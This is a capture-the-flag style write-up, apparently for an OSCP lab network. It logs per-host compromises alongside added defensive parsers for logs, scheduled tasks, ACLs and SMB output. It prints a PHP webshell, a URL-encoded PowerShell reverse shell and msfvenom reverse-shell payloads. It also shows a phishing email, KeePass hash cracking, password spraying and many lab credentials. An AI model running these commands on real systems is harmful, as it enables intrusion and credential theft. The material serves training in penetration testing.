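127.0.0.1 - - [27/Mar/2024:01:46:03 +0000] "GET /backend/?view=..%2F..%2F..%2F..%2F..%2Fdev/shm/test1.php HTTP/1.1" 200 97
"""
TRAVERSAL_RE = re.compile(r"(\.\./|/etc/passwd|/dev/shm/|/proc/self/)", re.IGNORECASE)


def suspicious_requests(log: str):
    """Request targets whose URL-decoded form shows traversal or a classic
    LFI target.  Decoding first matters: the third line only matches decoded."""
    hits = []
    for line in log.splitlines():
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and TRAVERSAL_RE.search(unquote(m.group(1))):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    for v in ("user.inc", "../../../../../etc/passwd", "../../../../../dev/shm/test1.php"):
        print(f"{v!r}: unsafe -> {resolve_unsafe(v)}, blocked by safe -> {is_blocked(v)}")
    print(suspicious_requests(ACCESS_LOG))
```

The reason the /dev/shm trick worked is visible in resolve_unsafe: the application never cared where the resolved path ended up, only that PHP could read it. Confining the path is the fix; watching for `../`, /etc/passwd and /dev/shm in decoded query strings is the detection that would have lit up during this test.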

WDavid404 commented 8 months ago

192.168.x.247

nmap scan for all ports: nmap -sV -v -p- 192.168.x.247 (Don't add -T5) --> found more ports:

80/tcp    open     http               Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
443/tcp   open     ssl/http           Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
445/tcp   open     microsoft-ds?
3389/tcp  open     ssl/ms-wbt-server?
5985/tcp  open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) ★
14020/tcp open     ftp                FileZilla ftpd                                          ★
14080/tcp open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)  ★
26679/tcp filtered unknown
47001/tcp open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) ★
49664/tcp open     msrpc              Microsoft Windows RPC
49665/tcp open     msrpc              Microsoft Windows RPC
49666/tcp open     msrpc              Microsoft Windows RPC
49667/tcp open     msrpc              Microsoft Windows RPC
49668/tcp open     msrpc              Microsoft Windows RPC
49669/tcp open     msrpc              Microsoft Windows RPC
49670/tcp open     msrpc              Microsoft Windows RPC

---->

ftp 192.168.213.247 -P 14020 ---> Get umbraco.pdf file --->
• the user account: mark@relia.com passwd: OathDeeplyReprieve91
• IIS is configured to only allow access to Umbraco using the server FQDN at the moment.
  o e.g. web02.relia.com, not just web02.

----> Add '192.168.213.247 web02.relia.com' to /etc/hosts

---> Can access "web02.relia.com:14070" but FAILED to access 'web02.relia.com:5985' or 47001 ---> Go to 'http://web02.relia.com:14080/umbraco#/login/false?returnPath=%252Fumbraco'

Try login to page using mark@relia.com/OathDeeplyReprieve91 ---> Succeed. On 'help' menu ---> Umbraco version 7.12.4

searchsploit umbraco 7.12 ---> RCE 49488.py ---> python3 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c whoami works!

python3 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c powershell.exe -a '-e ...' ---> We got a reverse shell !! find local.txt under 'C:/'

find c:/xampp/passwords.txt

## MySQL (phpMyAdmin):
   User: root
   Password:
   (means no password!)

## Mercury (not in the USB & lite version): 
   Postmaster: Postmaster (postmaster@localhost)
   Administrator: Admin (admin@localhost)

   User: newuser  
   Password: wampp 

## WEBDAV: 
   User: xampp-dav-unsecure
   Password: ppmax2011

iwr -uri http://192.168.45.243:9001/OSCP-Tools/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe ---> Failed...

iwr -uri http://192.168.45.243:9001/OSCP-Tools/winPEASx64.exe -Outfile winPEAS.exe ---> failed..

search on c:/xampp/webdav ---> URL: http://localhost/webdav/ User: wampp Password: xampp

cat c:/inetpub/wwwroot/Web.config -->

<mailSettings>
  <smtp from="noreply@example.com">
    <network host="127.0.0.1" userName="username" password="password" />
  </smtp>
</mailSettings>

Check services list: Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} -->
...
Apache2.4        Running  "C:\xampp\apache\bin\httpd.exe" -k runservice
FileZillaServer  Running  "C:\xampp\filezillaftp\filezillaserver.exe"
...

--> We can place a dll in "C:\xampp\apache\bin" and restart httpd.exe

[Kali] msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.243 LPORT=443 -f exe -o met.exe

nc -vlp 443

[Victim] sc.exe stop Apache2.4
mv httpd.exe httpd_bk.exe
certutil -urlcache -f http://192.168.45.243:9001/met.exe C:/xampp/apache/bin/httpd.exe
sc.exe start Apache2.4

---> Got root. ---> proof.txt

WDavid404 commented 8 months ago

192.168.x.248

It has 445 port --> try smb access

smbclient '//192.168.213.248/transfer' -N -c 'prompt OFF;recurse ON;mget *' // will download all files to local
find a Database.kdbx file in 'DB-back (1)/New Folder/Emma/Documents'

keepass2john Database.kdbx > keepass.hash
cat keepass.hash

Database:$keepass$*2*60000*0*682a0e535986c0ab7f02ef294ddfdf869d39bf9e29e17a2d521eb0cdcbd744c0*3d7849d98a8eae59f70b27b1eba401db19dbbae8c095b8be52ef08ffd05a747a*c56d10e5ace50d5924d4b6a9781af20a*947c768ced6729f3741485b9f6ee0737ad70e11933ebdb727c627fe5bc66491a*55de9df220b1d816eb6bad76da248c383a8fde3dbfb2d77e3bb50a25b5ef6133

Remove 'Database:' from keepass.hash then,

hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force


RDP login to 250: xfreerdp /u:offsec /p:lab /w:1200 /h:800 +fonts +clipboard /v:192.168.223.250 /drive:.,kali-share /cert-ignore

On the 250 machine, download and install the KeePass app, then open database.kdbx using the cracked password. Download site: https://sourceforge.net/projects/keepass/files/KeePass%202.x/2.56/KeePass-2.56-Setup.exe/download --->

- User Name/Password  https://keepass.info/
- Michael321/12345 https://keepass.info/help/kb/testform.html
- (retired) bo/Luigi=Papal1963  Backup Operator
- Emma/SomersetVinyl1!  Windows
- <empty>/HabitsAgesEnd123 Windows Old
- sa/SAPassword_1998   SQL

xfreerdp /u:Emma /p:SomersetVinyl1! /w:1200 /h:800 +fonts +clipboard /v:192.168.236.248 /drive:.,kali-share /cert-ignore ---> Success!! ---> Got local.txt

248 is standalone and not in the AD domain.

WinPeas.exe ----> doesn't work
WindowsEnum.ps1 ---> env variable --------> AppKey: !8@aBRBYdb3!

Manual enum: found "C:\BetaMonitor" and a log saying "Couldn't find BetaLibrary.Dll." ---> so we can make a BetaLibrary.Dll? No running process or service is associated with BetaMonitor.exe... However, if we check the log file again, we can realize that somebody is trying to run BetaMonitor every second but fails due to the lack of BetaLibrary.dll ---->
[Kali] msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.243 LPORT=443 -f dll -o BetaLibrary.dll
nc -lvp 443
[Victim] place BetaLibrary.dll in 'C:\BetaMonitor' ---> Failed... Need admin permission to copy this file...

DLL hijacking search path:

  1. The directory from which the application loaded.
  2. The system directory.
  3. The 16-bit system directory.
  4. The Windows directory.
  5. The current directory.
  6. The directories that are listed in the PATH environment variable.

echo $env:path /// show all path variable info without skipping ---> It has 'C:\Users\emma\AppData\Local\Microsoft\WindowsApps' ----> Doesn't work...........

schtasks /query /fo LIST /v --->

Folder: \
HostName:                             EXTERNAL
TaskName:                             \BetaTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        3/27/2024 1:44:52 AM
Last Result:                          0
Author:                               Administrator
Task To Run:                          C:\BetaMonitor\BetaMonitor.exe
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up

PS C:\Users\emma> icacls C:\BetaMonitor\BetaMonitor.exe ---->

C:\BetaMonitor\BetaMonitor.exe BUILTIN\Users:(I)(RX)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Administrators:(I)(F)

---> we only have (I)(RX) permission on C:\BetaMonitor\BetaMonitor.exe ------------> No way in via BetaMonitor, which is a rabbit hole !!!

Run winpeas.bat --->

 [+] AppCmd
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.

---> refer to https://github.com/carlospolop/hacktricks/tree/master/windows-hardening/windows-local-privilege-escalation#appcmd-exe ----> But it is not the intended way...

In env variable --------> AppKey: !8@aBRBYdb3! Use it as password!
xfreerdp /u:mark /p:\!8@aBRBYdb3\! /w:1200 /h:800 +fonts +clipboard /v:192.168.236.248 /drive:.,kali-share /cert-ignore ----> yeah -----> proof.txt
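
Added example, not from the write-up: the BetaTask finding above came out of reading `schtasks /query /fo LIST /v` by eye. The parser below turns that LIST output into records and lists tasks that run as SYSTEM from a binary outside the Windows tree; those are the entries whose directory ACL and DLL dependencies are worth checking, exactly the questions asked about C:\BetaMonitor above. The sample is the BetaTask record from this page plus one constructed, benign task.

```python
"""Parse 'schtasks /query /fo LIST /v' output and flag high-privilege tasks
whose binary lives outside the Windows system tree.  Added example; the first
record is from this page, the second is constructed."""
import re
from typing import Dict, List, Tuple

SAMPLE_TASKS = r"""
Folder: \
HostName:                             EXTERNAL
TaskName:                             \BetaTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        3/27/2024 1:44:52 AM
Last Result:                          0
Author:                               Administrator
Task To Run:                          C:\BetaMonitor\BetaMonitor.exe
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up

Folder: \Microsoft\Windows\Defrag
HostName:                             EXTERNAL
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Status:                               Ready
Task To Run:                          %windir%\system32\defrag.exe -c -h -k -g -$
Run As User:                          SYSTEM
Schedule Type:                        Weekly
"""

# Binaries under these prefixes are protected by the default system ACLs.
TRUSTED_PREFIXES = ("c:\\windows\\", "%windir%\\", "%systemroot%\\")
HIGH_PRIV = {"system", "nt authority\\system", "administrators", "builtin\\administrators"}


def parse_schtasks_list(text: str) -> List[Dict[str, str]]:
    """Records are separated by blank lines; each line is 'Key: value', and only
    the first colon separates them (values such as times contain more)."""
    tasks, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                tasks.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        tasks.append(current)
    return tasks


def executable_of(command: str) -> str:
    """Strip arguments (and surrounding quotes) from a 'Task To Run' value."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(" ", 1)[0]


def tasks_outside_system_tree(tasks: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    flagged = []
    for t in tasks:
        exe = executable_of(t.get("Task To Run", "")).lower()
        if (t.get("Run As User", "").lower() in HIGH_PRIV
                and exe and not exe.startswith(TRUSTED_PREFIXES)):
            flagged.append((t["TaskName"], t["Task To Run"]))
    return flagged


if __name__ == "__main__":
    for name, cmd in tasks_outside_system_tree(parse_schtasks_list(SAMPLE_TASKS)):
        print(f"{name}: runs {cmd} as SYSTEM outside the system tree")
```

A hit from this list is only the starting point: as the icacls check above showed for BetaMonitor.exe, a SYSTEM task in an odd directory is harmless when the directory and binary are not writable by low-privileged users, and the remedy on the defensive side is the same check (directory ACL, and whether every DLL the binary loads resolves from a protected path).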

WDavid404 commented 8 months ago

192.168.x.249

gobuster dir -u http://192.168.189.249/ -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config ---> No info

nmap scan again: nmap -sV -T4 -Pn -v 192.168.223.249 --->

80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8000/tcp open  http          Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/7.4.30) --->  ⭐

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

feroxbuster -u http://192.168.236.249:8000 -x html -x php -x aspx ---> /cms

...

Found version info: RiteCMS version v3

searchsploit ritecms --> RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) - php/webapps/50616.txt

Read 50616.txt ---> Access http://192.168.223.249:8000/cms/admin.php ---> Login via admin/admin. Click 'Admin' menu --> File manager --> upload file ---> Upload webshell.pHp file

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

Made using https://www.revshells.com/

---> Access http://192.168.223.249:8000/cms/media/webshell.pHp?cmd=whoami
--> work!

Access

http://192.168.223.249:8000/cms/media/webshell.pHp?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.45.243%27%2C4443%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22


--> We got a reverse shell in the nc listener! ---> find local.txt. This machine is standalone and not in the AD domain.

whoami /priv --> SeImpersonatePrivilege is enabled. Try PrintSpoofer64.exe:
iwr -uri http://192.168.45.243:9001/OSCP-Tools/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe --> Failed....

Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue --> no useful info

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} --> Apache2.4 Running "C:\xampp\apache\bin\httpd.exe" -k runservice
--> icacls C:\xampp\apache\bin\httpd.exe --> C:\xampp\apache\bin\httpd.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) Everyone:(I)(F)
--> sc.exe stop Apache2.4 --> Failed: Access is denied....

schtasks /query /fo LIST /v --> no useful info.

iwr -uri http://192.168.45.243:9001/OSCP-Tools/WindowsEnum.ps1 -Outfile WindowsEnum.ps1 ./WindowsEnum.ps1 --> no useful info

iwr -uri http://192.168.45.243:9001/OSCP-Tools/winPEAS.bat -Outfile winPEAS.bat
./winPEAS.bat ---> doesn't work

whoami /priv --> SeImpersonatePrivilege is enabled. Try to use GodPotato

iwr -uri http://192.168.45.243:9001/OSCP-Tools/GodPotato-NET4.exe -Outfile GodPotato-NET4.exe
iwr -uri http://192.168.45.243:9001/OSCP-Tools/nc64.exe -Outfile nc64.exe
./GodPotato-NET4.exe -cmd "C:\Users\adrian\nc64.exe -e c:\windows\system32\cmd.exe 192.168.45.243 4445" ---> Got reverse shell on our NC listener.

But it didn't show output for some commands such as whoami. Try to add adrian to the admin group:

net localgroup administrators adrian /add  ## Add adrian to admin group
net user adrian password123         # change adrian's password to password123.
net localgroup "Remote Desktop Users" adrian /add  

RDP login: xfreerdp /u:'adrian' /p:'password123' /v:192.168.223.249 /cert-ignore /compression /auto-reconnect /bpp:8 ---> succeeded, logged in with admin rights; found 'proof.txt' in damon folder.

found a hidden .git folder in C:/staging folder

C:\staging>git status
fatal: detected dubious ownership in repository at 'C:/staging'
'C:/staging' is owned by:
        'S-1-5-32-544'
but the current user is:
        'S-1-5-21-464543310-226837244-3834982083-1004'
To add an exception for this directory, call:

        git config --global --add safe.directory C:/staging

C:\staging>git config --global --add safe.directory C:/staging   ★
C:\staging>git status
On branch master
nothing to commit, working tree clean

C:\staging>git log
--->
found log info

C:\staging> git show 8b430c17c16e6c0515e49c4eafdd129f719fde74

---> maildmz@relia.com:DPuBT9tGCBrTbR jim@relia.com: responsible for the mail server
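
Added example serving the two icacls listings on this page (BetaMonitor.exe in the .248 comment and httpd.exe here), not code from the write-up: it parses icacls output and reports every ACE that gives a low-privileged principal a right that lets it modify or replace the file. The sample is constructed from the two listings above; the parser assumes paths without spaces, which is an assumption stated in the code. Note that the file ACL is separate from the service's own control ACL: Everyone holds (F) on httpd.exe, while `sc.exe stop` was still denied.

```python
"""Flag weak ACEs in icacls output: low-privileged principals with write-class
rights on a file.  Added example; SAMPLE_ICACLS is constructed from the two
listings in this write-up."""
import re
from typing import Dict, List, Tuple

SAMPLE_ICACLS = r"""
C:\BetaMonitor\BetaMonitor.exe BUILTIN\Users:(I)(RX)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files

C:\xampp\apache\bin\httpd.exe NT AUTHORITY\SYSTEM:(I)(F)
                              BUILTIN\Administrators:(I)(F)
                              Everyone:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# First line of an entry: '<path> <principal>:(flags)(rights)'.  Assumption: the
# path contains no spaces (quote-free icacls output, as on this page).
FIRST_RE = re.compile(r"^(?P<path>[A-Za-z]:\\\S*)\s+(?P<ace>.+)$")
ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<perms>(?:\([A-Za-z,]*\))+)$")

LOW_PRIV = {"everyone", "builtin\\users", "users", "authenticated users",
            "nt authority\\authenticated users", "nt authority\\interactive"}
# F full, M modify, W write, D delete, WD write data, AD append data,
# WDAC write DACL, WO write owner, DC delete child: any of these lets the
# holder change or replace the file (or its ACL).
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO", "DC"}


def parse_icacls(text: str) -> Dict[str, List[Tuple[str, List[str]]]]:
    """path -> [(principal, [tokens])], tokens being the parenthesised groups,
    e.g. 'BUILTIN\\Users:(I)(RX)' -> ('BUILTIN\\Users', ['I', 'RX'])."""
    entries: Dict[str, List[Tuple[str, List[str]]]] = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("Successfully processed"):
            continue
        if not raw[0].isspace():
            m = FIRST_RE.match(raw)
            if not m:
                continue
            current = m.group("path")
            entries[current] = []
            ace_text = m.group("ace")
        else:
            ace_text = raw.strip()  # continuation line: ACE only
        m = ACE_RE.match(ace_text)
        if m and current:
            tokens = re.findall(r"\(([A-Za-z,]*)\)", m.group("perms"))
            entries[current].append((m.group("principal"), tokens))
    return entries


def weak_aces(entries: Dict[str, List[Tuple[str, List[str]]]]) -> List[Tuple[str, str, str]]:
    """(path, principal, right) for each low-privileged principal holding a
    write-class right.  Inheritance flags such as (I)/(OI)/(CI) are ignored."""
    weak = []
    for path, aces in entries.items():
        for principal, tokens in aces:
            if principal.lower() not in LOW_PRIV:
                continue
            rights = {r for token in tokens for r in token.split(",") if r}
            for r in sorted(rights & WRITE_RIGHTS):
                weak.append((path, principal, r))
    return weak


if __name__ == "__main__":
    for path, principal, right in weak_aces(parse_icacls(SAMPLE_ICACLS)):
        print(f"{path}: {principal} has ({right})")
```

Run against `icacls <path> /T` output for service and scheduled-task binaries, this produces the short list that matters: BetaMonitor.exe comes back clean (Users only have RX, which is why that path was a rabbit hole), httpd.exe comes back with Everyone:(F), which is the finding that let the binary be swapped on .247 and that a service-binary ACL audit should catch.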

WDavid404 commented 8 months ago

172.16.x.14

Try phishing email to jim, refer to https://github.com/WDavid404/OSCP/issues/5#issuecomment-2015071589
sudo swaks -t jim@relia.com --from maildmz@relia.com --attach @config.Library-ms --server 192.168.236.189 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

└─$ nc -lvp 4444  
listening on [any] 4444 ...
192.168.236.191: inverse host lookup failed: Unknown host
connect to [192.168.45.161] from (UNKNOWN) [192.168.236.191] 62835
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami
whoami
relia\jim
PS C:\Windows\System32\WindowsPowerShell\v1.0> ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.16.126.14
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.126.254
PS C:\Windows\System32\WindowsPowerShell\v1.0> 

Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue --> Got local.txt and proof.txt

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
PS C:\Users\dave> Get-History
---> Get-CimInstance : Access denied

whoami /priv --> No SeImpersonatePrivilege... But SeShutdownPrivilege.

ping <Kali's IP> --> works, so we can transfer files/tools from Kali to the .14 machine.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.161 LPORT=4445 -f exe -o met.exe
iwr -uri http://192.168.45.161:9001/met.exe -Outfile Autologon.exe
shutdown /r /t 0
---> doesn't work...

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue ---> C:\Users\jim\Documents\Database.kdbx

Send Database.kdbx to Kali (using the SMB share folder), then:

keepass2john Database.kdbx > keepass.hash
cat keepass.hash
Database:$keepass$*2*60000*0*682a0e535986c0ab7f02ef294ddfdf8....

Remove 'Database:' from keepass.hash, then:

hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
---> master password: mercedes1

Open Database.kdbx on .250 ---> jim@relia.com / Castello1!, dmzadmin / SlimGodhoodMope; logon local admin.

Other: Try mimikatz ---> Failed: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

WDavid404 commented 8 months ago

192.168.x.191

hydra -L users.txt -P passwords.txt 192.168.236.191 http-get ---> failed.

Use the cred info found on .14 to RDP login to 191:
xfreerdp /u:dmzadmin /p:SlimGodhoodMope /v:192.168.236.191 /cert-ignore /w:1200 /h:800 /compression /auto-reconnect /drive:.,kali-share +clipboard
---> succeeded ---> got local.txt

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue --> No info

mimikatz ---> ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

ipconfig --> 192.168.x.191, 172.16.129.254 ---> It is connected to 172.16.x.x, so we can set up a chisel tunnel on 191.

WDavid404 commented 8 months ago

Recon2

Build an HTTP tunnel between Kali and 191, then:

proxychains -q crackmapexec smb 172.16.129.6 172.16.129.7 172.16.129.15 172.16.129.19 172.16.129.20 172.16.129.21 172.16.129.30 -u users.txt -d relia.com -p passwords.txt --shares --->

SMB         172.16.129.7    445    INTRANET         Share           Permissions     Remark
SMB         172.16.129.7    445    INTRANET         -----           -----------     ------
SMB         172.16.129.7    445    INTRANET         ADMIN$                          Remote Admin
SMB         172.16.129.7    445    INTRANET         C$                              Default share
SMB         172.16.129.7    445    INTRANET         IPC$            READ            Remote IPC

SMB         172.16.129.15   445    WK02             Share           Permissions     Remark
SMB         172.16.129.15   445    WK02             -----           -----------     ------
SMB         172.16.129.15   445    WK02             ADMIN$                          Remote Admin
SMB         172.16.129.15   445    WK02             C$                              Default share
SMB         172.16.129.15   445    WK02             IPC$            READ            Remote IPC

SMB         172.16.129.6    445    DC02             Share           Permissions     Remark
SMB         172.16.129.6    445    DC02             -----           -----------     ------
SMB         172.16.129.6    445    DC02             ADMIN$                          Remote Admin
SMB         172.16.129.6    445    DC02             C$                              Default share
SMB         172.16.129.6    445    DC02             IPC$            READ            Remote IPC
SMB         172.16.129.6    445    DC02             NETLOGON        READ            Logon server share 
SMB         172.16.129.6    445    DC02             SYSVOL          READ            Logon server share 

SMB         172.16.129.30   445    WEBBY            Share           Permissions     Remark
SMB         172.16.129.30   445    WEBBY            -----           -----------     ------
SMB         172.16.129.30   445    WEBBY            ADMIN$                          Remote Admin
SMB         172.16.129.30   445    WEBBY            C$                              Default share
SMB         172.16.129.30   445    WEBBY            IPC$            READ            Remote IPC

SMB         172.16.129.21   445    FILES            [+] relia.com\jim:Castello1! 
SMB         172.16.129.21   445    FILES            ADMIN$                          Remote Admin
SMB         172.16.129.21   445    FILES            apps            READ            
SMB         172.16.129.21   445    FILES            C$                              Default share
SMB         172.16.129.21   445    FILES            IPC$            READ            Remote IPC
SMB         172.16.129.21   445    FILES            monitoring      READ            
SMB         172.16.129.21   445    FILES            scripts         READ  

Also check the ssh and winrm protocols ---> No useful info

Try checking the shared SMB folder

proxychains -q smbclient '//172.16.129.21/monitoring' -N -c 'prompt OFF;recurse ON;mget *' --user=relia.com/jim%Castello1! 
proxychains -q smbclient '//172.16.129.21/scripts' -N -c 'prompt OFF;recurse ON;mget *' --user=relia.com/jim%Castello1! 

---> We can get some info:

- CVE-2021-36934
- RELIA\john.m / YouWillNeverTakeMyTractor!1922
- RELIA\Administrator / vau!XCKjNQBv2$

proxychains -q crackmapexec smb 172.16.129.6 172.16.129.7 172.16.129.15 172.16.129.19 172.16.129.20 172.16.129.21 172.16.129.30 -u john.m -d relia.com -p YouWillNeverTakeMyTractor\!1922 ---> No info

proxychains -q crackmapexec smb 172.16.129.6 172.16.129.7 172.16.129.15 172.16.129.19 172.16.129.20 172.16.129.21 172.16.129.30 -u Administrator -d relia.com -p vau\!XCKjNQBv2\$ --->

SMB         172.16.129.15   445    WK02             [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
SMB         172.16.129.6    445    DC02             [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
SMB         172.16.129.7    445    INTRANET         [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
SMB         172.16.129.21   445    FILES            [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
SMB         172.16.129.30   445    WEBBY            [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
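
The share listing and the two password sprays above are the kind of crackmapexec output that is easy to misread at scale: the default `ADMIN$`, `C$`, `IPC$`, `NETLOGON` and `SYSVOL` entries show up on every host and bury the three custom shares on FILES that actually held the credentials. As an added example (not part of this issue, and not a CME/NetExec API, just a parser for the text the tool prints), the Python below turns `smb ... --shares` output into per-host share lists, drops the default shares, separates readable from writable, pulls out the `[+]` logins and marks the `(Pwn3d!)` ones, and emits the `smbclient` lines for the next step. The sample is trimmed from the output above, with one constructed `READ,WRITE` line added so the writable case is exercised.

```python
import re

# Trimmed from the crackmapexec output above; the `scripts ... READ,WRITE` line is
# constructed so a writable share is present.
SAMPLE = r"""
SMB         172.16.129.6    445    DC02             [+] relia.com\jim:Castello1! 
SMB         172.16.129.6    445    DC02             Share           Permissions     Remark
SMB         172.16.129.6    445    DC02             -----           -----------     ------
SMB         172.16.129.6    445    DC02             ADMIN$                          Remote Admin
SMB         172.16.129.6    445    DC02             C$                              Default share
SMB         172.16.129.6    445    DC02             IPC$            READ            Remote IPC
SMB         172.16.129.6    445    DC02             NETLOGON        READ            Logon server share 
SMB         172.16.129.6    445    DC02             SYSVOL          READ            Logon server share 
SMB         172.16.129.21   445    FILES            [+] relia.com\jim:Castello1! 
SMB         172.16.129.21   445    FILES            ADMIN$                          Remote Admin
SMB         172.16.129.21   445    FILES            apps            READ            
SMB         172.16.129.21   445    FILES            C$                              Default share
SMB         172.16.129.21   445    FILES            IPC$            READ            Remote IPC
SMB         172.16.129.21   445    FILES            monitoring      READ            
SMB         172.16.129.21   445    FILES            scripts         READ,WRITE      constructed writable share
SMB         172.16.129.15   445    WK02             [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)
"""

# Present on every Windows host; readable IPC$/NETLOGON/SYSVOL are not findings by themselves.
DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$", "NETLOGON", "SYSVOL", "print$"}

ROW_RE = re.compile(r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+(?P<host>\S+)\s+(?P<rest>.*)$")
SHARE_RE = re.compile(r"^(?P<share>\S+)\s+(?P<perms>READ,WRITE|READ|WRITE)?\s*(?P<remark>.*)$")
LOGIN_RE = re.compile(
    r"^\[\+\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<password>\S+)(?P<admin>\s+\(Pwn3d!\))?$"
)


def parse_cme_output(text):
    """Return ({host: {"ip": ip, "shares": [{"name", "perms", "remark"}]}}, [logins])."""
    hosts, logins = {}, []
    for raw in text.splitlines():
        m = ROW_RE.match(raw.rstrip())
        if not m:
            continue
        entry = hosts.setdefault(m["host"], {"ip": m["ip"], "shares": []})
        rest = m["rest"]
        lm = LOGIN_RE.match(rest)
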